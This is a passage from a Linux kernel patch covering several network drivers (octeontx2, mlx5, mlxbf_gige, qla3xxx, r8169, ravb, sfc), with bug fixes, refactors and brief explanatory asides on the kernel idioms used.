+ 	unsigned long		pf_notify_bmap; /* Flags for PF notification */
+@@ -850,6 +850,7 @@ u32  rvu_cgx_get_fifolen(struct rvu *rvu);
+ void *rvu_first_cgx_pdata(struct rvu *rvu);
+ int cgxlmac_to_pf(struct rvu *rvu, int cgx_id, int lmac_id);
+ int rvu_cgx_config_tx(void *cgxd, int lmac_id, bool enable);
++int rvu_cgx_tx_enable(struct rvu *rvu, u16 pcifunc, bool enable);
+ int rvu_cgx_prio_flow_ctrl_cfg(struct rvu *rvu, u16 pcifunc, u8 tx_pause, u8 rx_pause,
+ 			       u16 pfc_en);
+ int rvu_cgx_cfg_pause_frm(struct rvu *rvu, u16 pcifunc, u8 tx_pause, u8 rx_pause);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+index c60b9580ca969..bcb4385d0621c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+@@ -55,8 +55,9 @@ bool is_mac_feature_supported(struct rvu *rvu, int pf, int feature)
+ 	return  (cgx_features_get(cgxd) & feature);
+ }
+ 
++#define CGX_OFFSET(x)			((x) * rvu->hw->lmac_per_cgx)
+ /* Returns bitmap of mapped PFs */
+-static u16 cgxlmac_to_pfmap(struct rvu *rvu, u8 cgx_id, u8 lmac_id)
++static u64 cgxlmac_to_pfmap(struct rvu *rvu, u8 cgx_id, u8 lmac_id)
+ {
+ 	return rvu->cgxlmac2pf_map[CGX_OFFSET(cgx_id) + lmac_id];
+ }
+@@ -71,7 +72,8 @@ int cgxlmac_to_pf(struct rvu *rvu, int cgx_id, int lmac_id)
+ 	if (!pfmap)
+ 		return -ENODEV;
+ 	else
+-		return find_first_bit(&pfmap, 16);
++		return find_first_bit(&pfmap,
++				      rvu->cgx_cnt_max * rvu->hw->lmac_per_cgx);
+ }
+ 
+ static u8 cgxlmac_id_to_bmap(u8 cgx_id, u8 lmac_id)
+@@ -129,14 +131,14 @@ static int rvu_map_cgx_lmac_pf(struct rvu *rvu)
+ 	if (!cgx_cnt_max)
+ 		return 0;
+ 
+-	if (cgx_cnt_max > 0xF || MAX_LMAC_PER_CGX > 0xF)
++	if (cgx_cnt_max > 0xF || rvu->hw->lmac_per_cgx > 0xF)
+ 		return -EINVAL;
+ 
+ 	/* Alloc map table
+ 	 * An additional entry is required since PF id starts from 1 and
+ 	 * hence entry at offset 0 is invalid.
+ 	 */
+-	size = (cgx_cnt_max * MAX_LMAC_PER_CGX + 1) * sizeof(u8);
++	size = (cgx_cnt_max * rvu->hw->lmac_per_cgx + 1) * sizeof(u8);
+ 	rvu->pf2cgxlmac_map = devm_kmalloc(rvu->dev, size, GFP_KERNEL);
+ 	if (!rvu->pf2cgxlmac_map)
+ 		return -ENOMEM;
+@@ -145,9 +147,10 @@ static int rvu_map_cgx_lmac_pf(struct rvu *rvu)
+ 	memset(rvu->pf2cgxlmac_map, 0xFF, size);
+ 
+ 	/* Reverse map table */
+-	rvu->cgxlmac2pf_map = devm_kzalloc(rvu->dev,
+-				  cgx_cnt_max * MAX_LMAC_PER_CGX * sizeof(u16),
+-				  GFP_KERNEL);
++	rvu->cgxlmac2pf_map =
++		devm_kzalloc(rvu->dev,
++			     cgx_cnt_max * rvu->hw->lmac_per_cgx * sizeof(u64),
++			     GFP_KERNEL);
+ 	if (!rvu->cgxlmac2pf_map)
+ 		return -ENOMEM;
+ 
+@@ -156,7 +159,7 @@ static int rvu_map_cgx_lmac_pf(struct rvu *rvu)
+ 		if (!rvu_cgx_pdata(cgx, rvu))
+ 			continue;
+ 		lmac_bmap = cgx_get_lmac_bmap(rvu_cgx_pdata(cgx, rvu));
+-		for_each_set_bit(iter, &lmac_bmap, MAX_LMAC_PER_CGX) {
++		for_each_set_bit(iter, &lmac_bmap, rvu->hw->lmac_per_cgx) {
+ 			lmac = cgx_get_lmacid(rvu_cgx_pdata(cgx, rvu),
+ 					      iter);
+ 			rvu->pf2cgxlmac_map[pf] = cgxlmac_id_to_bmap(cgx, lmac);
+@@ -235,7 +238,8 @@ static void cgx_notify_pfs(struct cgx_link_event *event, struct rvu *rvu)
+ 	pfmap = cgxlmac_to_pfmap(rvu, event->cgx_id, event->lmac_id);
+ 
+ 	do {
+-		pfid = find_first_bit(&pfmap, 16);
++		pfid = find_first_bit(&pfmap,
++				      rvu->cgx_cnt_max * rvu->hw->lmac_per_cgx);
+ 		clear_bit(pfid, &pfmap);
+ 
+ 		/* check if notification is enabled */
+@@ -310,7 +314,7 @@ static int cgx_lmac_event_handler_init(struct rvu *rvu)
+ 		if (!cgxd)
+ 			continue;
+ 		lmac_bmap = cgx_get_lmac_bmap(cgxd);
+-		for_each_set_bit(lmac, &lmac_bmap, MAX_LMAC_PER_CGX) {
++		for_each_set_bit(lmac, &lmac_bmap, rvu->hw->lmac_per_cgx) {
+ 			err = cgx_lmac_evh_register(&cb, cgxd, lmac);
+ 			if (err)
+ 				dev_err(rvu->dev,
+@@ -396,7 +400,7 @@ int rvu_cgx_exit(struct rvu *rvu)
+ 		if (!cgxd)
+ 			continue;
+ 		lmac_bmap = cgx_get_lmac_bmap(cgxd);
+-		for_each_set_bit(lmac, &lmac_bmap, MAX_LMAC_PER_CGX)
++		for_each_set_bit(lmac, &lmac_bmap, rvu->hw->lmac_per_cgx)
+ 			cgx_lmac_evh_unregister(cgxd, lmac);
+ 	}
+ 
+@@ -456,6 +460,23 @@ int rvu_cgx_config_rxtx(struct rvu *rvu, u16 pcifunc, bool start)
+ 	return mac_ops->mac_rx_tx_enable(cgxd, lmac_id, start);
+ }
+ 
++int rvu_cgx_tx_enable(struct rvu *rvu, u16 pcifunc, bool enable)
++{
++	int pf = rvu_get_pf(pcifunc);
++	struct mac_ops *mac_ops;
++	u8 cgx_id, lmac_id;
++	void *cgxd;
++
++	if (!is_cgx_config_permitted(rvu, pcifunc))
++		return LMAC_AF_ERR_PERM_DENIED;
++
++	rvu_get_cgx_lmac_id(rvu->pf2cgxlmac_map[pf], &cgx_id, &lmac_id);
++	cgxd = rvu_cgx_pdata(cgx_id, rvu);
++	mac_ops = get_mac_ops(cgxd);
++
++	return mac_ops->mac_tx_enable(cgxd, lmac_id, enable);
++}
++
+ int rvu_cgx_config_tx(void *cgxd, int lmac_id, bool enable)
+ {
+ 	struct mac_ops *mac_ops;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+index 5c9dc3f9262f5..cc5d342e026c7 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+@@ -2618,7 +2618,7 @@ static void rvu_dbg_cgx_init(struct rvu *rvu)
+ 		rvu->rvu_dbg.cgx = debugfs_create_dir(dname,
+ 						      rvu->rvu_dbg.cgx_root);
+ 
+-		for_each_set_bit(lmac_id, &lmac_bmap, MAX_LMAC_PER_CGX) {
++		for_each_set_bit(lmac_id, &lmac_bmap, rvu->hw->lmac_per_cgx) {
+ 			/* lmac debugfs dir */
+ 			sprintf(dname, "lmac%d", lmac_id);
+ 			rvu->rvu_dbg.lmac =
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 959f36efdc4a6..bb99302eab67a 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -3923,90 +3923,18 @@ static void nix_find_link_frs(struct rvu *rvu,
+ 		req->minlen = minlen;
+ }
+ 
+-static int
+-nix_config_link_credits(struct rvu *rvu, int blkaddr, int link,
+-			u16 pcifunc, u64 tx_credits)
+-{
+-	struct rvu_hwinfo *hw = rvu->hw;
+-	int pf = rvu_get_pf(pcifunc);
+-	u8 cgx_id = 0, lmac_id = 0;
+-	unsigned long poll_tmo;
+-	bool restore_tx_en = 0;
+-	struct nix_hw *nix_hw;
+-	u64 cfg, sw_xoff = 0;
+-	u32 schq = 0;
+-	u32 credits;
+-	int rc;
+-
+-	nix_hw = get_nix_hw(rvu->hw, blkaddr);
+-	if (!nix_hw)
+-		return NIX_AF_ERR_INVALID_NIXBLK;
+-
+-	if (tx_credits == nix_hw->tx_credits[link])
+-		return 0;
+-
+-	/* Enable cgx tx if disabled for credits to be back */
+-	if (is_pf_cgxmapped(rvu, pf)) {
+-		rvu_get_cgx_lmac_id(rvu->pf2cgxlmac_map[pf], &cgx_id, &lmac_id);
+-		restore_tx_en = !rvu_cgx_config_tx(rvu_cgx_pdata(cgx_id, rvu),
+-						    lmac_id, true);
+-	}
+-
+-	mutex_lock(&rvu->rsrc_lock);
+-	/* Disable new traffic to link */
+-	if (hw->cap.nix_shaping) {
+-		schq = nix_get_tx_link(rvu, pcifunc);
+-		sw_xoff = rvu_read64(rvu, blkaddr, NIX_AF_TL1X_SW_XOFF(schq));
+-		rvu_write64(rvu, blkaddr,
+-			    NIX_AF_TL1X_SW_XOFF(schq), BIT_ULL(0));
+-	}
+-
+-	rc = NIX_AF_ERR_LINK_CREDITS;
+-	poll_tmo = jiffies + usecs_to_jiffies(200000);
+-	/* Wait for credits to return */
+-	do {
+-		if (time_after(jiffies, poll_tmo))
+-			goto exit;
+-		usleep_range(100, 200);
+-
+-		cfg = rvu_read64(rvu, blkaddr,
+-				 NIX_AF_TX_LINKX_NORM_CREDIT(link));
+-		credits = (cfg >> 12) & 0xFFFFFULL;
+-	} while (credits != nix_hw->tx_credits[link]);
+-
+-	cfg &= ~(0xFFFFFULL << 12);
+-	cfg |= (tx_credits << 12);
+-	rvu_write64(rvu, blkaddr, NIX_AF_TX_LINKX_NORM_CREDIT(link), cfg);
+-	rc = 0;
+-
+-	nix_hw->tx_credits[link] = tx_credits;
+-
+-exit:
+-	/* Enable traffic back */
+-	if (hw->cap.nix_shaping && !sw_xoff)
+-		rvu_write64(rvu, blkaddr, NIX_AF_TL1X_SW_XOFF(schq), 0);
+-
+-	/* Restore state of cgx tx */
+-	if (restore_tx_en)
+-		rvu_cgx_config_tx(rvu_cgx_pdata(cgx_id, rvu), lmac_id, false);
+-
+-	mutex_unlock(&rvu->rsrc_lock);
+-	return rc;
+-}
+-
+ int rvu_mbox_handler_nix_set_hw_frs(struct rvu *rvu, struct nix_frs_cfg *req,
+ 				    struct msg_rsp *rsp)
+ {
+ 	struct rvu_hwinfo *hw = rvu->hw;
+ 	u16 pcifunc = req->hdr.pcifunc;
+ 	int pf = rvu_get_pf(pcifunc);
+-	int blkaddr, schq, link = -1;
+-	struct nix_txsch *txsch;
+-	u64 cfg, lmac_fifo_len;
++	int blkaddr, link = -1;
+ 	struct nix_hw *nix_hw;
+ 	struct rvu_pfvf *pfvf;
+ 	u8 cgx = 0, lmac = 0;
+ 	u16 max_mtu;
++	u64 cfg;
+ 
+ 	blkaddr = rvu_get_blkaddr(rvu, BLKTYPE_NIX, pcifunc);
+ 	if (blkaddr < 0)
+@@ -4027,25 +3955,6 @@ int rvu_mbox_handler_nix_set_hw_frs(struct rvu *rvu, struct nix_frs_cfg *req,
+ 	if (req->update_minlen && req->minlen < NIC_HW_MIN_FRS)
+ 		return NIX_AF_ERR_FRS_INVALID;
+ 
+-	/* Check if requester wants to update SMQ's */
+-	if (!req->update_smq)
+-		goto rx_frscfg;
+-
+-	/* Update min/maxlen in each of the SMQ attached to this PF/VF */
+-	txsch = &nix_hw->txsch[NIX_TXSCH_LVL_SMQ];
+-	mutex_lock(&rvu->rsrc_lock);
+-	for (schq = 0; schq < txsch->schq.max; schq++) {
+-		if (TXSCH_MAP_FUNC(txsch->pfvf_map[schq]) != pcifunc)
+-			continue;
+-		cfg = rvu_read64(rvu, blkaddr, NIX_AF_SMQX_CFG(schq));
+-		cfg = (cfg & ~(0xFFFFULL << 8)) | ((u64)req->maxlen << 8);
+-		if (req->update_minlen)
+-			cfg = (cfg & ~0x7FULL) | ((u64)req->minlen & 0x7F);
+-		rvu_write64(rvu, blkaddr, NIX_AF_SMQX_CFG(schq), cfg);
+-	}
+-	mutex_unlock(&rvu->rsrc_lock);
+-
+-rx_frscfg:
+ 	/* Check if config is for SDP link */
+ 	if (req->sdp_link) {
+ 		if (!hw->sdp_links)
+@@ -4068,7 +3977,6 @@ rx_frscfg:
+ 	if (link < 0)
+ 		return NIX_AF_ERR_RX_LINK_INVALID;
+ 
+-
+ linkcfg:
+ 	nix_find_link_frs(rvu, req, pcifunc);
+ 
+@@ -4078,19 +3986,7 @@ linkcfg:
+ 		cfg = (cfg & ~0xFFFFULL) | req->minlen;
+ 	rvu_write64(rvu, blkaddr, NIX_AF_RX_LINKX_CFG(link), cfg);
+ 
+-	if (req->sdp_link || pf == 0)
+-		return 0;
+-
+-	/* Update transmit credits for CGX links */
+-	lmac_fifo_len = rvu_cgx_get_lmac_fifolen(rvu, cgx, lmac);
+-	if (!lmac_fifo_len) {
+-		dev_err(rvu->dev,
+-			"%s: Failed to get CGX/RPM%d:LMAC%d FIFO size\n",
+-			__func__, cgx, lmac);
+-		return 0;
+-	}
+-	return nix_config_link_credits(rvu, blkaddr, link, pcifunc,
+-				       (lmac_fifo_len - req->maxlen) / 16);
++	return 0;
+ }
+ 
+ int rvu_mbox_handler_nix_set_rx_cfg(struct rvu *rvu, struct nix_rx_cfg *req,
+@@ -4183,7 +4079,7 @@ static void nix_link_config(struct rvu *rvu, int blkaddr,
+ 
+ 		/* Get LMAC id's from bitmap */
+ 		lmac_bmap = cgx_get_lmac_bmap(rvu_cgx_pdata(cgx, rvu));
+-		for_each_set_bit(iter, &lmac_bmap, MAX_LMAC_PER_CGX) {
++		for_each_set_bit(iter, &lmac_bmap, rvu->hw->lmac_per_cgx) {
+ 			lmac_fifo_len = rvu_cgx_get_lmac_fifolen(rvu, cgx, iter);
+ 			if (!lmac_fifo_len) {
+ 				dev_err(rvu->dev,
+@@ -4610,7 +4506,13 @@ int rvu_mbox_handler_nix_lf_stop_rx(struct rvu *rvu, struct msg_req *req,
+ 	pfvf = rvu_get_pfvf(rvu, pcifunc);
+ 	clear_bit(NIXLF_INITIALIZED, &pfvf->flags);
+ 
+-	return rvu_cgx_start_stop_io(rvu, pcifunc, false);
++	err = rvu_cgx_start_stop_io(rvu, pcifunc, false);
++	if (err)
++		return err;
++
++	rvu_cgx_tx_enable(rvu, pcifunc, true);
++
++	return 0;
+ }
+ 
+ #define RX_SA_BASE  GENMASK_ULL(52, 7)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+index 34fa59575fa91..54e0dfdc9d984 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+@@ -1999,7 +1999,9 @@ int rvu_npc_exact_init(struct rvu *rvu)
+ 	/* Install SDP drop rule */
+ 	drop_mcam_idx = &table->num_drop_rules;
+ 
+-	max_lmac_cnt = rvu->cgx_cnt_max * MAX_LMAC_PER_CGX + PF_CGXMAP_BASE;
++	max_lmac_cnt = rvu->cgx_cnt_max * rvu->hw->lmac_per_cgx +
++		       PF_CGXMAP_BASE;
++
+ 	for (i = PF_CGXMAP_BASE; i < max_lmac_cnt; i++) {
+ 		if (rvu->pf2cgxlmac_map[i] == 0xFF)
+ 			continue;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c b/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
+index d136360ac6a98..a6d3fc96e1685 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
+@@ -25,7 +25,7 @@
+ struct mlx5_irq {
+ 	struct atomic_notifier_head nh;
+ 	cpumask_var_t mask;
+-	char name[MLX5_MAX_IRQ_NAME];
++	char name[MLX5_MAX_IRQ_FORMATTED_NAME];
+ 	struct mlx5_irq_pool *pool;
+ 	int refcount;
+ 	u32 index;
+@@ -236,8 +236,8 @@ struct mlx5_irq *mlx5_irq_alloc(struct mlx5_irq_pool *pool, int i,
+ 	else
+ 		irq_sf_set_name(pool, name, i);
+ 	ATOMIC_INIT_NOTIFIER_HEAD(&irq->nh);
+-	snprintf(irq->name, MLX5_MAX_IRQ_NAME,
+-		 "%s@pci:%s", name, pci_name(dev->pdev));
++	snprintf(irq->name, MLX5_MAX_IRQ_FORMATTED_NAME,
++		 MLX5_IRQ_NAME_FORMAT_STR, name, pci_name(dev->pdev));
+ 	err = request_irq(irq->irqn, irq_int_handler, 0, irq->name,
+ 			  &irq->nh);
+ 	if (err) {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.h b/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.h
+index 5c7e68bee43a0..4047179307c4a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.h
+@@ -7,6 +7,9 @@
+ #include <linux/mlx5/driver.h>
+ 
+ #define MLX5_MAX_IRQ_NAME (32)
++#define MLX5_IRQ_NAME_FORMAT_STR ("%s@pci:%s")
++#define MLX5_MAX_IRQ_FORMATTED_NAME \
++	(MLX5_MAX_IRQ_NAME + sizeof(MLX5_IRQ_NAME_FORMAT_STR))
+ /* max irq_index is 2047, so four chars */
+ #define MLX5_MAX_IRQ_IDX_CHARS (4)
+ #define MLX5_EQ_REFS_PER_IRQ (2)
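(Deriving the buffer size from the format string keeps the two in sync, and
sizeof() on a string literal includes the terminating NUL, so the "@pci:" literal
and the terminator are always covered. The sizing rule in isolation, with
illustrative macro names:

#define MAX_IRQ_NAME		32
#define IRQ_NAME_FMT		"%s@pci:%s"
#define MAX_IRQ_FORMATTED_NAME	(MAX_IRQ_NAME + sizeof(IRQ_NAME_FMT))	/* 42 */
)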
+diff --git a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
+index 0d5a41a2ae010..227d01cace3f0 100644
+--- a/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
++++ b/drivers/net/ethernet/mellanox/mlxbf_gige/mlxbf_gige_rx.c
+@@ -267,6 +267,13 @@ static bool mlxbf_gige_rx_packet(struct mlxbf_gige *priv, int *rx_pkts)
+ 		priv->stats.rx_truncate_errors++;
+ 	}
+ 
++	/* Read the receive consumer index before replenishing so that this
++	 * routine returns an accurate value even if a packet is received
++	 * into the just-replenished buffer before this routine exits.
++	 */
++	rx_ci = readq(priv->base + MLXBF_GIGE_RX_CQE_PACKET_CI);
++	rx_ci_rem = rx_ci % priv->rx_q_entries;
++
+ 	/* Let hardware know we've replenished one buffer */
+ 	rx_pi++;
+ 
+@@ -279,8 +286,6 @@ static bool mlxbf_gige_rx_packet(struct mlxbf_gige *priv, int *rx_pkts)
+ 	rx_pi_rem = rx_pi % priv->rx_q_entries;
+ 	if (rx_pi_rem == 0)
+ 		priv->valid_polarity ^= 1;
+-	rx_ci = readq(priv->base + MLXBF_GIGE_RX_CQE_PACKET_CI);
+-	rx_ci_rem = rx_ci % priv->rx_q_entries;
+ 
+ 	if (skb)
+ 		netif_receive_skb(skb);
+diff --git a/drivers/net/ethernet/qlogic/qla3xxx.c b/drivers/net/ethernet/qlogic/qla3xxx.c
+index 0d57ffcedf0c6..fc78bc959ded8 100644
+--- a/drivers/net/ethernet/qlogic/qla3xxx.c
++++ b/drivers/net/ethernet/qlogic/qla3xxx.c
+@@ -2591,6 +2591,7 @@ static int ql_alloc_buffer_queues(struct ql3_adapter *qdev)
+ 
+ 	if (qdev->lrg_buf_q_alloc_virt_addr == NULL) {
+ 		netdev_err(qdev->ndev, "lBufQ failed\n");
++		kfree(qdev->lrg_buf);
+ 		return -ENOMEM;
+ 	}
+ 	qdev->lrg_buf_q_virt_addr = qdev->lrg_buf_q_alloc_virt_addr;
+@@ -2615,6 +2616,7 @@ static int ql_alloc_buffer_queues(struct ql3_adapter *qdev)
+ 				  qdev->lrg_buf_q_alloc_size,
+ 				  qdev->lrg_buf_q_alloc_virt_addr,
+ 				  qdev->lrg_buf_q_alloc_phy_addr);
++		kfree(qdev->lrg_buf);
+ 		return -ENOMEM;
+ 	}
+ 
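(Both error paths above now release the qdev->lrg_buf array allocated earlier in
the function. The same unwinding is commonly written with the goto-cleanup idiom;
a sketch under hypothetical names, not the driver's code:

static int alloc_queues_example(struct device *dev)
{
	dma_addr_t ring_dma;
	void *bufs, *ring;

	bufs = kmalloc(4096, GFP_KERNEL);
	if (!bufs)
		return -ENOMEM;

	ring = dma_alloc_coherent(dev, 8192, &ring_dma, GFP_KERNEL);
	if (!ring)
		goto err_free_bufs;	/* later failures unwind the same way */

	return 0;

err_free_bufs:
	kfree(bufs);
	return -ENOMEM;
}
)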
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index d22457f2cf9cf..06663c11ca96d 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -1145,7 +1145,7 @@ static void rtl8168ep_driver_start(struct rtl8169_private *tp)
+ {
+ 	r8168ep_ocp_write(tp, 0x01, 0x180, OOB_CMD_DRIVER_START);
+ 	r8168ep_ocp_write(tp, 0x01, 0x30, r8168ep_ocp_read(tp, 0x30) | 0x01);
+-	rtl_loop_wait_high(tp, &rtl_ep_ocp_read_cond, 10000, 10);
++	rtl_loop_wait_high(tp, &rtl_ep_ocp_read_cond, 10000, 30);
+ }
+ 
+ static void rtl8168_driver_start(struct rtl8169_private *tp)
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index 68cb5616ef991..c2c56a5289caf 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -68,16 +68,27 @@ int ravb_wait(struct net_device *ndev, enum ravb_reg reg, u32 mask, u32 value)
+ 	return -ETIMEDOUT;
+ }
+ 
+-static int ravb_config(struct net_device *ndev)
++static int ravb_set_opmode(struct net_device *ndev, u32 opmode)
+ {
++	u32 csr_ops = 1U << (opmode & CCC_OPC);
++	u32 ccc_mask = CCC_OPC;
+ 	int error;
+ 
+-	/* Set config mode */
+-	ravb_modify(ndev, CCC, CCC_OPC, CCC_OPC_CONFIG);
+-	/* Check if the operating mode is changed to the config mode */
+-	error = ravb_wait(ndev, CSR, CSR_OPS, CSR_OPS_CONFIG);
+-	if (error)
+-		netdev_err(ndev, "failed to switch device to config mode\n");
++	/* If gPTP active in config mode is supported, it needs to be configured
++	 * along with CSEL and the operating mode in the same access. This is a
++	 * hardware limitation.
++	 */
++	if (opmode & CCC_GAC)
++		ccc_mask |= CCC_GAC | CCC_CSEL;
++
++	/* Set operating mode */
++	ravb_modify(ndev, CCC, ccc_mask, opmode);
++	/* Check if the operating mode is changed to the requested one */
++	error = ravb_wait(ndev, CSR, CSR_OPS, csr_ops);
++	if (error) {
++		netdev_err(ndev, "failed to switch device to requested mode (%u)\n",
++			   opmode & CCC_OPC);
++	}
+ 
+ 	return error;
+ }
+@@ -675,7 +686,7 @@ static int ravb_dmac_init(struct net_device *ndev)
+ 	int error;
+ 
+ 	/* Set CONFIG mode */
+-	error = ravb_config(ndev);
++	error = ravb_set_opmode(ndev, CCC_OPC_CONFIG);
+ 	if (error)
+ 		return error;
+ 
+@@ -684,9 +695,7 @@ static int ravb_dmac_init(struct net_device *ndev)
+ 		return error;
+ 
+ 	/* Setting the control will start the AVB-DMAC process. */
+-	ravb_modify(ndev, CCC, CCC_OPC, CCC_OPC_OPERATION);
+-
+-	return 0;
++	return ravb_set_opmode(ndev, CCC_OPC_OPERATION);
+ }
+ 
+ static void ravb_get_tx_tstamp(struct net_device *ndev)
+@@ -1048,7 +1057,7 @@ static int ravb_stop_dma(struct net_device *ndev)
+ 		return error;
+ 
+ 	/* Stop AVB-DMAC process */
+-	return ravb_config(ndev);
++	return ravb_set_opmode(ndev, CCC_OPC_CONFIG);
+ }
+ 
+ /* E-MAC interrupt handler */
+@@ -2576,21 +2585,25 @@ static int ravb_set_gti(struct net_device *ndev)
+ 	return 0;
+ }
+ 
+-static void ravb_set_config_mode(struct net_device *ndev)
++static int ravb_set_config_mode(struct net_device *ndev)
+ {
+ 	struct ravb_private *priv = netdev_priv(ndev);
+ 	const struct ravb_hw_info *info = priv->info;
++	int error;
+ 
+ 	if (info->gptp) {
+-		ravb_modify(ndev, CCC, CCC_OPC, CCC_OPC_CONFIG);
++		error = ravb_set_opmode(ndev, CCC_OPC_CONFIG);
++		if (error)
++			return error;
+ 		/* Set CSEL value */
+ 		ravb_modify(ndev, CCC, CCC_CSEL, CCC_CSEL_HPB);
+ 	} else if (info->ccc_gac) {
+-		ravb_modify(ndev, CCC, CCC_OPC, CCC_OPC_CONFIG |
+-			    CCC_GAC | CCC_CSEL_HPB);
++		error = ravb_set_opmode(ndev, CCC_OPC_CONFIG | CCC_GAC | CCC_CSEL_HPB);
+ 	} else {
+-		ravb_modify(ndev, CCC, CCC_OPC, CCC_OPC_CONFIG);
++		error = ravb_set_opmode(ndev, CCC_OPC_CONFIG);
+ 	}
++
++	return error;
+ }
+ 
+ /* Set tx and rx clock internal delay modes */
+@@ -2810,7 +2823,9 @@ static int ravb_probe(struct platform_device *pdev)
+ 	ndev->ethtool_ops = &ravb_ethtool_ops;
+ 
+ 	/* Set AVB config mode */
+-	ravb_set_config_mode(ndev);
++	error = ravb_set_config_mode(ndev);
++	if (error)
++		goto out_disable_gptp_clk;
+ 
+ 	if (info->gptp || info->ccc_gac) {
+ 		/* Set GTI value */
+@@ -2933,8 +2948,7 @@ static int ravb_remove(struct platform_device *pdev)
+ 	dma_free_coherent(ndev->dev.parent, priv->desc_bat_size, priv->desc_bat,
+ 			  priv->desc_bat_dma);
+ 
+-	/* Set reset mode */
+-	ravb_write(ndev, CCC_OPC_RESET, CCC);
++	ravb_set_opmode(ndev, CCC_OPC_RESET);
+ 
+ 	clk_disable_unprepare(priv->gptp_clk);
+ 	clk_disable_unprepare(priv->refclk);
+@@ -3018,8 +3032,11 @@ static int __maybe_unused ravb_resume(struct device *dev)
+ 	int ret = 0;
+ 
+ 	/* If WoL is enabled set reset mode to rearm the WoL logic */
+-	if (priv->wol_enabled)
+-		ravb_write(ndev, CCC_OPC_RESET, CCC);
++	if (priv->wol_enabled) {
++		ret = ravb_set_opmode(ndev, CCC_OPC_RESET);
++		if (ret)
++			return ret;
++	}
+ 
+ 	/* All register have been reset to default values.
+ 	 * Restore all registers which where setup at probe time and
+@@ -3027,7 +3044,9 @@ static int __maybe_unused ravb_resume(struct device *dev)
+ 	 */
+ 
+ 	/* Set AVB config mode */
+-	ravb_set_config_mode(ndev);
++	ret = ravb_set_config_mode(ndev);
++	if (ret)
++		return ret;
+ 
+ 	if (info->gptp || info->ccc_gac) {
+ 		/* Set GTI value */
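
The ravb rework above funnels every operating-mode change through one helper that writes CCC and then polls CSR until the hardware reports the requested mode, propagating -ETIMEDOUT otherwise. The write-then-poll shape, as a userspace sketch against a toy register model (names hypothetical):

  #include <errno.h>
  #include <stdio.h>

  /* Toy stand-ins for the CCC (control) and CSR (status) registers. */
  static unsigned int ccc, csr;

  static void hw_tick(void)
  {
          csr = 1u << (ccc & 0x3);        /* "hardware" applies the mode */
  }

  /* Request a mode, then wait for the status register to confirm it,
   * mirroring ravb_set_opmode()'s ravb_modify() + ravb_wait() pair. */
  static int set_opmode(unsigned int opmode, int tries)
  {
          ccc = opmode;
          while (tries--) {
                  hw_tick();
                  if (csr == (1u << (opmode & 0x3)))
                          return 0;
          }
          return -ETIMEDOUT;
  }

  int main(void)
  {
          printf("set_opmode(CONFIG) -> %d\n", set_opmode(1, 10));
          return 0;
  }
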
+diff --git a/drivers/net/ethernet/sfc/rx_common.c b/drivers/net/ethernet/sfc/rx_common.c
+index 9220afeddee81..3f290791df1c4 100644
+--- a/drivers/net/ethernet/sfc/rx_common.c
++++ b/drivers/net/ethernet/sfc/rx_common.c
+@@ -820,8 +820,10 @@ int efx_probe_filters(struct efx_nic *efx)
+ 		}
+ 
+ 		if (!success) {
+-			efx_for_each_channel(channel, efx)
++			efx_for_each_channel(channel, efx) {
+ 				kfree(channel->rps_flow_id);
++				channel->rps_flow_id = NULL;
++			}
+ 			efx->type->filter_table_remove(efx);
+ 			rc = -ENOMEM;
+ 			goto out_unlock;
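
The sfc hunk clears channel->rps_flow_id right after kfree() so that any later cleanup pass over the same channels becomes a harmless no-op, since kfree(NULL), like free(NULL), is defined to do nothing. The free-and-poison idiom in isolation:

  #include <stdlib.h>

  struct channel {
          void *rps_flow_id;
  };

  /* Free and poison: a repeated call is then safe, which is what the
   * error path above relies on when filter probing fails part-way. */
  static void channel_free_flow_ids(struct channel *ch)
  {
          free(ch->rps_flow_id);          /* free(NULL) is a no-op */
          ch->rps_flow_id = NULL;
  }

  int main(void)
  {
          struct channel ch = { .rps_flow_id = malloc(64) };

          channel_free_flow_ids(&ch);
          channel_free_flow_ids(&ch);     /* idempotent, no double free */
          return 0;
  }
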
+diff --git a/drivers/net/gtp.c b/drivers/net/gtp.c
+index 477b4d4f860bd..bace989591f75 100644
+--- a/drivers/net/gtp.c
++++ b/drivers/net/gtp.c
+@@ -629,7 +629,7 @@ static void __gtp_encap_destroy(struct sock *sk)
+ 			gtp->sk0 = NULL;
